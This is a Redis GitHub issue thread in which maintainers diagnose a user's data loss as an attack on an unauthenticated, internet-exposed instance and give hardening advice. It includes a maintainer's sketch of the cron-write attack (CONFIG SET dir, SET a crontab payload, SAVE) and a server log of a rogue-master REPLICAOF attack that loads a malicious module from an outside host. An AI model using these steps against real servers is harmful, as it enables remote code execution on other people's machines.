Describe the bug
Using Redis v6.2.4 from the Docker image, data is lost while storing and reading/writing data.
To reproduce
Expected behavior
Using version 6.2.4 with roughly 10 reads/writes per second, after about ten minutes the log shows 'DB saved on disk' but no success message; checking afterwards, none of the data in Redis exists anymore.
It becomes an empty database, as if freshly initialized.
Additional information
docker: 19.0.3
redis: 6.2.4
centos: 7.6
Comment From: sundb
Possibly similar to #9044.
Can you share the output of info all?
Comment From: oranagra
@warriorBrian from the logs, it looks like you're using the SAVE command (i.e. foreground save, rather than BGSAVE).
it doesn't look like this came from the mechanism behind the periodic snapshot persistence (the save config).
the periodic saving mechanism produces these logs:
14991:M 09 Jun 2021 14:15:04.869 * 1 changes in 1 seconds. Saving...
14991:M 09 Jun 2021 14:15:04.869 * Background saving started by pid 15210
15210:C 09 Jun 2021 14:15:04.891 * DB saved on disk
15210:C 09 Jun 2021 14:15:04.891 * RDB: 0 MB of memory used by copy-on-write
14991:M 09 Jun 2021 14:15:04.969 * Background saving terminated with success
and BGSAVE command produces all of them except for the first one.
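For reference, the periodic mechanism is configured by the save directives in redis.conf; a minimal sketch, with values matching the stock defaults in recent versions:

save 3600 1       # snapshot if at least 1 key changed within 3600 seconds
save 300 100      # snapshot if at least 100 keys changed within 300 seconds
save 60 10000     # snapshot if at least 10000 keys changed within 60 seconds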
i'm not sure what your complaint is: are you complaining that the file on disk is missing? or did some keys also disappear from redis (without a restart)?
did you use any previous version of redis in that configuration? i.e. is that a regression? or could it be that something in your docker setup is causing the file to get lost?
Comment From: warriorBrian
@oranagra To rule out interference, I set up a fresh environment, started with docker-compose; the configuration file is as follows:
version: "3.3"
services:
  redis:
    container_name: redis
    image: redis:5.0.9
    restart: always
    ports:
      - 6379:6379
    volumes:
      - "./redis.conf:/etc/redis.conf:ro"
      - "/etc/localtime:/etc/localtime"
    entrypoint: ["redis-server", "/etc/redis.conf"]
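Note that the ports mapping above publishes Redis on every interface of the host. If only local access is needed, a loopback-only mapping (a sketch, not part of the original file) avoids public exposure:

ports:
  - "127.0.0.1:6379:6379"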
Then I started using it normally, reading and writing data; after about ten minutes, all the keys and values in Redis were lost.
Comment From: warriorBrian
@sundb info all:
# Server
redis_version:6.2.1
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:b54db1313f408a09
redis_mode:standalone
os:Linux 3.10.0-1160.25.1.el7.x86_64 x86_64
arch_bits:64
multiplexing_api:epoll
atomicvar_api:c11-builtin
gcc_version:8.3.0
process_id:1
process_supervised:no
run_id:e137655b84e0d1f342c489dc8c5c62fe4f9f41ba
tcp_port:6379
server_time_usec:1623238485789277
uptime_in_seconds:8042
uptime_in_days:0
hz:10
configured_hz:10
lru_clock:12625749
executable:/data/redis-server
config_file:/etc/redis.conf
io_threads_active:0
# Clients
connected_clients:4
cluster_connections:0
maxclients:10000
client_recent_max_input_buffer:56
client_recent_max_output_buffer:0
blocked_clients:0
tracking_clients:0
clients_in_timeout_table:0
# Memory
used_memory:937432
used_memory_human:915.46K
used_memory_rss:7360512
used_memory_rss_human:7.02M
used_memory_peak:1617184
used_memory_peak_human:1.54M
used_memory_peak_perc:57.97%
used_memory_overhead:892136
used_memory_startup:809904
used_memory_dataset:45296
used_memory_dataset_perc:35.52%
allocator_allocated:1000240
allocator_active:1331200
allocator_resident:3698688
total_system_memory:1927114752
total_system_memory_human:1.79G
used_memory_lua:37888
used_memory_lua_human:37.00K
used_memory_scripts:0
used_memory_scripts_human:0B
number_of_cached_scripts:0
maxmemory:0
maxmemory_human:0B
maxmemory_policy:noeviction
allocator_frag_ratio:1.33
allocator_frag_bytes:330960
allocator_rss_ratio:2.78
allocator_rss_bytes:2367488
rss_overhead_ratio:1.99
rss_overhead_bytes:3661824
mem_fragmentation_ratio:8.23
mem_fragmentation_bytes:6465880
mem_not_counted_for_evict:0
mem_replication_backlog:0
mem_clients_slaves:0
mem_clients_normal:82040
mem_aof_buffer:0
mem_allocator:jemalloc-5.1.0
active_defrag_running:0
lazyfree_pending_objects:0
lazyfreed_objects:0
# Persistence
loading:0
current_cow_size:0
current_fork_perc:0.00%
current_save_keys_processed:0
current_save_keys_total:0
rdb_changes_since_last_save:0
rdb_bgsave_in_progress:0
rdb_last_save_time:1623235757
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:0
rdb_current_bgsave_time_sec:-1
rdb_last_cow_size:483328
aof_enabled:0
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
aof_last_write_status:ok
aof_last_cow_size:0
module_fork_in_progress:0
module_fork_last_cow_size:0
# Stats
total_connections_received:52
total_commands_processed:60218
instantaneous_ops_per_sec:0
total_net_input_bytes:1755109
total_net_output_bytes:1098843
instantaneous_input_kbps:0.00
instantaneous_output_kbps:0.00
rejected_connections:0
sync_full:0
sync_partial_ok:0
sync_partial_err:0
expired_keys:0
expired_stale_perc:0.00
expired_time_cap_reached_count:0
expire_cycle_cpu_milliseconds:357
evicted_keys:0
keyspace_hits:24779
keyspace_misses:15039
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:662
total_forks:125
migrate_cached_sockets:0
slave_expires_tracked_keys:0
active_defrag_hits:0
active_defrag_misses:0
active_defrag_key_hits:0
active_defrag_key_misses:0
tracking_total_keys:0
tracking_total_items:0
tracking_total_prefixes:0
unexpected_error_replies:0
total_error_replies:69
dump_payload_sanitizations:0
total_reads_processed:60264
total_writes_processed:60212
io_threaded_reads_processed:0
io_threaded_writes_processed:0
# Replication
role:master
connected_slaves:0
master_failover_state:no-failover
master_replid:f88134f9daef89cae97aca48bd070aa7978606f1
master_replid2:0000000000000000000000000000000000000000
master_repl_offset:0
second_repl_offset:-1
repl_backlog_active:0
repl_backlog_size:1048576
repl_backlog_first_byte_offset:0
repl_backlog_histlen:0
# CPU
used_cpu_sys:42.580776
used_cpu_user:18.663659
used_cpu_sys_children:0.360094
used_cpu_user_children:0.075961
used_cpu_sys_main_thread:42.452486
used_cpu_user_main_thread:18.659545
# Modules
# Commandstats
cmdstat_get:calls=39816,usec=342764,usec_per_call=8.61,rejected_calls=0,failed_calls=0
cmdstat_config:calls=146,usec=4282,usec_per_call=29.33,rejected_calls=0,failed_calls=49
cmdstat_select:calls=21,usec=99,usec_per_call=4.71,rejected_calls=0,failed_calls=0
cmdstat_command:calls=18,usec=14903,usec_per_call=827.94,rejected_calls=0,failed_calls=0
cmdstat_exists:calls=2,usec=6,usec_per_call=3.00,rejected_calls=0,failed_calls=0
cmdstat_flushall:calls=32,usec=89249,usec_per_call=2789.03,rejected_calls=0,failed_calls=0
cmdstat_cluster:calls=11,usec=104,usec_per_call=9.45,rejected_calls=0,failed_calls=11
cmdstat_ping:calls=12,usec=21,usec_per_call=1.75,rejected_calls=0,failed_calls=0
cmdstat_auth:calls=9,usec=34,usec_per_call=3.78,rejected_calls=0,failed_calls=9
cmdstat_del:calls=2,usec=10,usec_per_call=5.00,rejected_calls=0,failed_calls=0
cmdstat_save:calls=81,usec=222491,usec_per_call=2746.80,rejected_calls=0,failed_calls=0
cmdstat_set:calls=20046,usec=237230,usec_per_call=11.83,rejected_calls=0,failed_calls=0
cmdstat_scan:calls=5,usec=116,usec_per_call=23.20,rejected_calls=0,failed_calls=0
cmdstat_info:calls=17,usec=3208,usec_per_call=188.71,rejected_calls=0,failed_calls=0
# Errorstats
errorstat_ERR:count=69
# Cluster
cluster_enabled:0
# Keyspace
db0:keys=4,expires=0,avg_ttl=0
Comment From: oranagra
@warriorBrian is it 6.2.4, 6.2.1, or 5.0.9? each of your comments says something different. i do see many calls to FLUSHALL in your command stats.
is it possible in some way this server is exposed to the internet without any password and someone's abusing it?
this is consistent with the presence of SAVE calls and CONFIG calls. someone is probably trying to write into your crontab or some other system folder.
Comment From: warriorBrian
@oranagra To reproduce the error I tried three versions, and all three showed the same behavior; that's why three different versions appear.
I access Redis over its public IP; the port is completely open, with no password, and writable. Could that be the cause of the problem?
Comment From: oranagra
yeah. seems that someone is trying to attack your computer through the open redis.
run a quick redis-cli monitor session and you'll probably see what they're attempting.
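As a sketch of such a session (the address and command below are hypothetical, shaped like real MONITOR output):

redis-cli monitor
# every command the server processes is echoed live, e.g.:
# 1623238485.789277 [0 1.2.3.4:54182] "FLUSHALL"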
Comment From: oranagra
or do a config get dbfilename to see which file they're trying to write to. and check its contents to see if they succeeded.
Comment From: warriorBrian
@oranagra I can confirm that only I am accessing this IP at present. Do you mean that an attacker is accessing this IP, and that is what causes the problem?
Comment From: warriorBrian
@oranagra Yesterday I accessed it via the intranet (localhost), but Redis was still open to the public, so I had turned off protected mode in redis.conf. After this problem occurred, I used the public IP and wrote a write loop to verify it; the problem still exists.
The strange part is that I set up a server on the intranet with the same configuration, and reads and writes work fine there; only the publicly accessible server has this problem.
Comment From: warriorBrian
@oranagra I ran config get dbfilename. Reading and writing Redis succeeds at first; after ten-plus minutes the problem appears. It then quickly reports a successful save, but by that point all the keys and values in Redis are gone.
The problem appears some time after reading and writing begin, not right away.
Comment From: oranagra
i'm not sure i follow you.
what's the value returned by config get dbfilename?
i see in the command stats 32 calls to FLUSHALL and 81 calls to SAVE. did you issue these? if not, then i'm saying it is likely that someone connected to the open redis and called them.
the usual pattern is that attackers try to change dbfilename to /var/spool/cron or alike, put some data in the db, and call SAVE, hoping that linux will execute their code on your machine.
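A sketch of that well-known sequence, with a hypothetical target and an elided payload, run from an interactive redis-cli session against the exposed instance:

redis-cli -h <victim-ip>
> CONFIG SET dir /var/spool/cron        # point the dump directory at the cron spool
> CONFIG SET dbfilename root            # name the dump file like a crontab
> SET pwn "\n* * * * * <payload>\n"     # store a crontab-shaped line as a value
> SAVE                                  # foreground dump writes the file in place

cron implementations that tolerate the surrounding RDB binary garbage may then execute the embedded line, which would also explain the many SAVE and CONFIG calls in the stats.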
Comment From: oranagra
please also do config get dir
Comment From: warriorBrian
config get dbfilename:
1) "dbfilename"
2) "dump.rdb"
config get dir:
1) "dir"
2) "/data"
Comment From: oranagra
maybe it was restarted since that abuse attempt? is it possible that the 32 calls to FLUSHALL and 81 calls to SAVE were triggered by you? if not, i suggest you either use MONITOR to confirm, or just protect your redis with a password (and better yet, check some sensitive places in your system to verify they weren't compromised by an attack).
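A minimal sketch of adding a password (the value below is a placeholder):

# in redis.conf:
requirepass some-long-random-secret

# or at runtime, without a restart:
redis-cli CONFIG SET requirepass some-long-random-secret
redis-cli -a some-long-random-secret PING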
Comment From: warriorBrian
@oranagra The instance was idle for a period of time with no read or write operations from me. Its log:
1:M 09 Jun 2021 20:50:36.008 * DB saved on disk
1:M 09 Jun 2021 20:50:36.053 * DB saved on disk
1:M 09 Jun 2021 20:50:36.362 * DB saved on disk
1:M 09 Jun 2021 20:50:36.497 * DB saved on disk
1:S 09 Jun 2021 21:01:56.515 * Before turning into a replica, using my master parameters to synthesize a cached master: I may be able to synchronize with the new master with just a partial transfer.
1:S 09 Jun 2021 21:01:56.515 * REPLICAOF 194.38.20.199:8886 enabled (user request from 'id=21 addr=109.237.96.124:54182 fd=8 name= age=0 idle=0 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=47 qbuf-free=32721 obl=0 oll=0 omem=0 events=r cmd=slaveof')
1:S 09 Jun 2021 21:01:57.378 * Connecting to MASTER 194.38.20.199:8886
1:S 09 Jun 2021 21:01:57.378 * MASTER <-> REPLICA sync started
1:S 09 Jun 2021 21:01:57.682 * Non blocking connect for SYNC fired the event.
1:S 09 Jun 2021 21:01:57.986 * Master replied to PING, replication can continue...
1:S 09 Jun 2021 21:01:58.596 * Trying a partial resynchronization (request 3a82f8add111a6fb478fbacc825811ea1c31a888:1).
1:S 09 Jun 2021 21:01:58.901 * Full resync from master: ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ:1
1:S 09 Jun 2021 21:01:58.901 * Discarding previously cached master state.
1:S 09 Jun 2021 21:01:58.901 * MASTER <-> REPLICA sync: receiving 55648 bytes from master
1:S 09 Jun 2021 21:01:59.532 * MASTER <-> REPLICA sync: Flushing old data
1:S 09 Jun 2021 21:01:59.533 * MASTER <-> REPLICA sync: Loading DB in memory
1:S 09 Jun 2021 21:01:59.533 # Wrong signature trying to load DB from file
1:S 09 Jun 2021 21:01:59.533 # Failed trying to load the MASTER synchronization DB from disk
1:S 09 Jun 2021 21:02:00.392 * Connecting to MASTER 194.38.20.199:8886
1:S 09 Jun 2021 21:02:00.392 * MASTER <-> REPLICA sync started
1:S 09 Jun 2021 21:02:00.677 * Non blocking connect for SYNC fired the event.
1:S 09 Jun 2021 21:02:00.961 # Error condition on socket for SYNC: Connection reset by peer
1:S 09 Jun 2021 21:02:01.399 * Connecting to MASTER 194.38.20.199:8886
1:S 09 Jun 2021 21:02:01.399 * MASTER <-> REPLICA sync started
1:S 09 Jun 2021 21:02:01.702 * Non blocking connect for SYNC fired the event.
1:S 09 Jun 2021 21:02:02.005 # Error condition on socket for SYNC: Connection reset by peer
1:S 09 Jun 2021 21:02:02.405 * Connecting to MASTER 194.38.20.199:8886
1:S 09 Jun 2021 21:02:02.405 * MASTER <-> REPLICA sync started
1:S 09 Jun 2021 21:02:02.709 * Non blocking connect for SYNC fired the event.
1:S 09 Jun 2021 21:02:03.013 # Error condition on socket for SYNC: Connection reset by peer
1:S 09 Jun 2021 21:02:03.410 * Connecting to MASTER 194.38.20.199:8886
1:S 09 Jun 2021 21:02:03.410 * MASTER <-> REPLICA sync started
1:S 09 Jun 2021 21:02:03.715 * Non blocking connect for SYNC fired the event.
1:S 09 Jun 2021 21:02:04.019 # Error condition on socket for SYNC: Connection reset by peer
1:S 09 Jun 2021 21:02:04.311 * Module 'system' loaded from ./red2.so
1:S 09 Jun 2021 21:02:04.413 * Connecting to MASTER 194.38.20.199:8886
1:S 09 Jun 2021 21:02:04.413 * MASTER <-> REPLICA sync started
1:M 09 Jun 2021 21:02:04.702 # Setting secondary replication ID to 3a82f8add111a6fb478fbacc825811ea1c31a888, valid up to offset: 1. New replication ID is 99cfdf93777e15d2795e52eb550df39e1e74e75d
1:M 09 Jun 2021 21:02:04.702 * MASTER MODE enabled (user request from 'id=21 addr=109.237.96.124:54182 fd=8 name= age=8 idle=0 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=34 qbuf-free=32734 obl=0 oll=0 omem=0 events=r cmd=slaveof')
1:M 09 Jun 2021 21:02:37.085 * Module system unloaded
1:M 09 Jun 2021 21:04:48.455 * DB saved on disk
1:M 09 Jun 2021 21:04:48.484 * DB saved on disk
1:M 09 Jun 2021 21:04:48.653 * DB saved on disk
1:M 09 Jun 2021 21:04:48.715 * DB saved on disk
Comment From: oranagra
@warriorBrian don't you think it's clear that someone is attacking your redis??? they even loaded a redis module named "system"! i'd consider that computer compromised, disconnect it from the LAN, and wipe it, and even consider the LAN itself compromised!
Comment From: warriorBrian
@oranagra I thought this was a mechanism of redis itself, but I see now that someone is attacking. In practice only I should be using it. I will try setting a password and test whether this problem still occurs. Thank you very much.
Comment From: oranagra
There is a mechanism in redis to discourage people from exposing an unprotected server; it seems you turned it off. https://github.com/redis/redis/blob/8a86bca5ed09094b561284fcb5b1fc416a4016dc/redis.conf#L77-L94
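The directives behind that mechanism, as a minimal sketch of a hardened redis.conf (values illustrative):

bind 127.0.0.1 -::1    # listen only on loopback interfaces
protected-mode yes     # refuse remote clients when no bind/password is configured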
Comment From: sundb
@warriorBrian It is best to disable external access to the port.
Comment From: warriorBrian
@sundb @oranagra I will try enabling protected mode and setting a password, and test whether the problem occurs again. Thank you very much!
Comment From: warriorBrian
@oranagra I found these entries in MONITOR, which indicate that all of my data was cleared, even though I used an intranet connection and enabled protected mode.
I found that a flushall command had been executed, emptying all my keys; after they were cleared, nothing restored them.
Comment From: sundb
@warriorBrian I'm not sure I fully understand what you mean. Are you saying you're still under attack? Or that you want to recover the erased data?
Comment From: warriorBrian
@sundb I opened it to the intranet and accessed it over the LAN, but it was not open to the outside. I enabled protected mode, and I did not read or write any data. After a few minutes, I ran redis-cli monitor and found that a flushall had been executed, which confused me.
Comment From: warriorBrian
I didn't perform any read or write operations on Redis, but I found that a flushall was executed anyway, emptying all my keys. I'm not sure why.
Comment From: sundb
@warriorBrian Look at the client list and see whether the clients' IPs are from the intranet; even if it is a LAN, you had better add auth.
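For example (one line per connection; the sample line below is abridged and shaped like the entries in the logs above):

redis-cli CLIENT LIST
# id=21 addr=109.237.96.124:54182 fd=8 name= age=8 idle=0 flags=N db=0 ... cmd=slaveof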
Comment From: oranagra
@warriorBrian this system was already compromised (hacked). if i were you, i would stop worrying about the data that got lost, and start worrying about what other damage the attacker caused and what they gained access to.
in the logs you posted earlier we see the attacker's IP address (109.237.96.124), and we see that they succeeded in running their code on your machine (Module 'system' loaded from ./red2.so), so this machine, and anything it can freely access, should be considered compromised and wiped (that's what i would do).
Comment From: warriorBrian
@oranagra This server runs an online service; I will reinstall the system. I think the problem came from a scanner finding the exposed port and injecting through that opening. I will keep observing the problem, and I have set an access password to protect my server.